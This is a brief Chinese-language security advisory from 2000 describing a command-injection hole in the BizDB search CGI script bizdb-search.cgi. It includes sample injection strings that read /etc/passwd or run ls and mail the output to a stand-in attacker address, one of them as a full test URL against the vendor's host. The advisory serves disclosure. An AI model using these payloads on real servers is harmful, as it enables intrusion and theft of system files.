BizDB查询脚本允许执行任意命令发布时间:2000-04-12 更新时间:2000-04-12 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Misc详细描述 BizDB是Cnctek出品的数据库及搜索引擎,其中有一个用来查询数据库的CGI脚本名为bizdb-search.cgi,其参数可修改并使入侵者在服务器上执行命令。 bizdb-search.cgi脚本在没有对输入进行检查的情况下调用open命令,入侵者可以通过发送类似"; ... exploit commands ...|"的语句来获得对系统的控制,比如 ";cat%20/etc/passwd|mail%20attacker@evil.site|", 测试代码 http://www.cnctek.com/cgi-bin/bizdb1-search.cgi? template=bizdb-summary&dbname=;ls|mail% 20attacker@evil.site|&f6=^a.*&action=searchdbdisplay 解决方案 暂无 相关信息 |
